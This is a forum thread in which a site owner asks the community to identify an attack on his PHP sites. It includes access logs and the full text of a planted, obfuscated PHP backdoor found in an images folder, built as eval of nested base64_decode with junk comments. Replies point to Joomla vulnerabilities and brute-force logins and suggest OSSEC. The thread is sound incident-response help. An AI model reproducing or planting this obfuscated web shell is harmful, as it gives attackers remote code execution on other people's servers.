Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win


What kind of a hack is this?

Posted on 2014-12-23
Medium Priority
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs: - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1" - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>

Open in new window

What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Question by:Daniel Wilson
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
LVL 58

Expert Comment

ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website or one of the plugins/vulnerabilities of WP et al
Otherwise you need to check the server logs for SSH/FTP brute force attacks
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
LVL 58

Accepted Solution

Gary earned 2000 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day. - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

Open in new window

LVL 35

Expert Comment

ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

One of the biggest threats facing all high-value targets are APT's.  These threats include sophisticated tactics that "often starts with mapping human organization and collecting intelligence on employees, who are nowadays a weaker link than network…
This article investigates the question of whether a computer can really be cleaned once it has been infected, and what the best ways of cleaning a computer might be (in this author's opinion).
The viewer will learn how to dynamically set the form action using jQuery.
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…

604 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question